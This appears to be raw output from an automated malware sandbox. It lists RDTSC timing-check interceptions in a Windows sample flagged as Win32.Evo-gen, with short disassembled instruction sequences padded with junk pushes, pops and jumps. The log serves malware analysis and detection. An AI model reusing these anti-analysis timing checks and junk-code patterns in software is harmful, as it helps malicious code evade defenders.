Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 104F6B8 second address: 104F6C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jnl 00007F449CEB0736h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 104F6C8 second address: 104F6DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jnl 00007F449CC63D76h 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 104FC37 second address: 104FC53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F449CEB0736h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jmp 00007F449CEB073Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 104FF2E second address: 104FF3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F449CC63D7Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1054AC4 second address: 1054ACA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1054BE3 second address: 1054BE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1054BE8 second address: 1054BF2 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F449CEB0742h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1054BF2 second address: 1054BF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 105505E second address: 1055064 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1055064 second address: 1055084 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F449CC63D7Ch 0x00000008 pushad 0x00000009 jmp 00007F449CC63D7Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10551D2 second address: 10551D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10551D6 second address: 10551FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F449CC63D8Dh 0x0000000c jmp 00007F449CC63D85h 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10551FC second address: 1055230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F449CEB0747h 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F449CEB0740h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 105569C second address: 10556A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10556A0 second address: 10556A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1008805 second address: 1008809 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1008809 second address: 100880D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 100880D second address: 1008813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1008813 second address: 1008819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FDCEAF second address: FDCEC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnc 00007F449CC63D7Eh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FDCEC2 second address: FDCEDC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0745h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1055DCE second address: 1055DD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1055DD2 second address: 1055DDC instructions: 0x00000000 rdtsc 0x00000002 js 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1054614 second address: 1054642 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F449CC63D88h 0x00000009 jg 00007F449CC63D76h 0x0000000f popad 0x00000010 jmp 00007F449CC63D7Bh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1059BA2 second address: 1059BA8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1059BA8 second address: 1059BAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1059BAE second address: 1059BCD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F449CEB0738h 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F449CEB0741h 0x00000011 push edi 0x00000012 pop edi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FE55FD second address: FE5617 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D86h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FE5617 second address: FE564D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F449CEB074Ah 0x0000000c push esi 0x0000000d pop esi 0x0000000e jmp 00007F449CEB0742h 0x00000013 pushad 0x00000014 ja 00007F449CEB0736h 0x0000001a push esi 0x0000001b pop esi 0x0000001c jno 00007F449CEB0736h 0x00000022 popad 0x00000023 popad 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 105E1F9 second address: 105E1FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 105E387 second address: 105E391 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 105E391 second address: 105E396 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 105E396 second address: 105E3C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F449CEB0745h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jl 00007F449CEB0748h 0x00000012 push eax 0x00000013 push edx 0x00000014 jno 00007F449CEB0736h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 105E7EF second address: 105E81B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F449CC63D76h 0x0000000a jmp 00007F449CC63D84h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F449CC63D7Bh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 105E81B second address: 105E854 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnp 00007F449CEB0736h 0x0000000d push eax 0x0000000e pop eax 0x0000000f popad 0x00000010 js 00007F449CEB0738h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 popad 0x00000019 pushad 0x0000001a jnp 00007F449CEB0753h 0x00000020 jmp 00007F449CEB0747h 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 105E854 second address: 105E85B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 105EE1B second address: 105EE21 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 105EE21 second address: 105EE2B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F449CC63D7Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 105EF8B second address: 105EF8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 105F278 second address: 105F285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F449CC63D76h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 105F285 second address: 105F2AF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F449CEB0736h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push edx 0x0000000e jmp 00007F449CEB0744h 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007F449CEB0736h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1060C15 second address: 1060C1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1069F53 second address: 1069F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1069F57 second address: 1069F71 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F449CC63D7Dh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1069F71 second address: 1069F77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1068E04 second address: 1068E08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1068E08 second address: 1068E18 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F449CEB0736h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1068E18 second address: 1068E20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1068E20 second address: 1068E3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F449CEB0746h 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1068E3D second address: 1068E5D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F449CC63D7Bh 0x00000008 jmp 00007F449CC63D7Dh 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1068E5D second address: 1068E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F449CEB0736h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1029177 second address: 10291A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jbe 00007F449CC63D8Ah 0x00000016 jmp 00007F449CC63D84h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10291A1 second address: 1029220 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CEB0746h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F449CEB073Bh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 jno 00007F449CEB0744h 0x0000001a pop eax 0x0000001b push 00000000h 0x0000001d push edx 0x0000001e call 00007F449CEB0738h 0x00000023 pop edx 0x00000024 mov dword ptr [esp+04h], edx 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc edx 0x00000031 push edx 0x00000032 ret 0x00000033 pop edx 0x00000034 ret 0x00000035 mov ecx, 741C52E5h 0x0000003a pushad 0x0000003b push edi 0x0000003c movsx edi, si 0x0000003f pop ecx 0x00000040 popad 0x00000041 push 4EBDBC8Ch 0x00000046 jp 00007F449CEB073Eh 0x0000004c push esi 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 102930A second address: 1029310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1029310 second address: 1029314 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1029314 second address: 1029345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jng 00007F449CC63D8Dh 0x0000000f xchg eax, esi 0x00000010 mov di, 67AFh 0x00000014 push eax 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 102950F second address: 1029513 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10296CE second address: 10296EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F449CC63D87h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1029F91 second address: 1008805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 mov dword ptr [esp], eax 0x00000008 push 00000000h 0x0000000a push edi 0x0000000b call 00007F449CEB0738h 0x00000010 pop edi 0x00000011 mov dword ptr [esp+04h], edi 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc edi 0x0000001e push edi 0x0000001f ret 0x00000020 pop edi 0x00000021 ret 0x00000022 call dword ptr [ebp+122D1DB3h] 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1069574 second address: 1069578 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1069578 second address: 106957C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 106997B second address: 106997F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 106997F second address: 1069999 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F449CEB0736h 0x00000008 jmp 00007F449CEB0740h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1069999 second address: 10699B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F449CC63D81h 0x00000008 jnc 00007F449CC63D76h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1069B06 second address: 1069B0C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 106C432 second address: 106C448 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F449CC63D81h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 106E807 second address: 106E816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F449CEB073Ah 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 106E500 second address: 106E515 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D7Bh 0x00000007 jbe 00007F449CC63D82h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 106E515 second address: 106E51B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10718FA second address: 1071907 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F449CC63D78h 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FE8C26 second address: FE8C2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FE8C2B second address: FE8C32 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1071319 second address: 107131D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 107131D second address: 1071381 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F449CC63D89h 0x00000007 jmp 00007F449CC63D83h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 jnc 00007F449CC63D76h 0x0000001b popad 0x0000001c js 00007F449CC63D7Ah 0x00000022 pushad 0x00000023 popad 0x00000024 push edx 0x00000025 pop edx 0x00000026 popad 0x00000027 push edi 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F449CC63D7Ch 0x0000002f jmp 00007F449CC63D7Ch 0x00000034 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10714CB second address: 10714CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 10714CF second address: 10714D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FEC145 second address: FEC14B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FEC14B second address: FEC151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: FEC151 second address: FEC15E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1076C09 second address: 1076C19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F449CC63D76h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1076F07 second address: 1076F0D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1076F0D second address: 1076F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.29833.28353.exe RDTSC instruction interceptor: First address: 1077049 second address: 107705D instructions: 0x00000000 rdtsc 0x00000002 jng 00007F449CEB0736h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F449CEB073Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
